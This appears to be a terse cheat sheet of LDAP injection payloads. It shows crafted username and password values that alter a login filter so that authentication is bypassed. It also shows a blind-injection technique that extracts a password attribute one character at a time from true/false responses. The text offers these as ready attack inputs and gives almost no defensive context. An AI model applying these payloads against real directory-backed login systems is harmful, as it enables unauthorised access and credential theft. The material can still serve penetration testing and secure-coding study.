# Classical request : (&(uid=)(userPassword=))# So result is TRUE if uid AND userPassword are true# You can put ‘)’ in request to crash and see the request
username : *)(|(uid=*
password : )
→ (&(uid=*)(|(uid=*)(userPassword=)))
OR
username=*
password=*)(&
→ (&(uid=*)(userPassword=*)(&))
Blind LDAP Injection
# You have to find/imagine how is the request built# test using only a char → OK → request is (mail=*[texte]*)# You can try (mail=*)(sn=*) → )(sn= → OK# Then, the password attribute (mail=*)(password=*) → OK
@*)(password=x → FALSE
@*)(password=d → TRUE
# You can the enumerate each char